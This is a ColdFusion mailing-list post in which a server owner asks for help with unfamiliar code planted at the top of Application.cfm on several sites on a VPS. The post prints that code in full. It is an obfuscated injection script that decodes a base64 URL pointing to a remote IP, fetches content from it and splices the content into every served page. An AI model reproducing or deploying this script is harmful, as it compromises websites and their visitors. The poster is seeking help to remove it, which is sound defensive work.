I noticed my CF server started timing out a lot lately. Then I looked at the
code and on the Application.cfm page at the top was this code that I didn't put
there. Anybody know what this is and how it might have gotten on the
Application.cfm pages of the sites on this VPS? Not sure how it got there. Any
help in plugging this hole would be appreciated.
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent
variable="paga"><CFHTTP METHOD = "Get" URL =
"http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#"; userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<CFHTTP METHOD = "Get" URL =
"#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354227
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
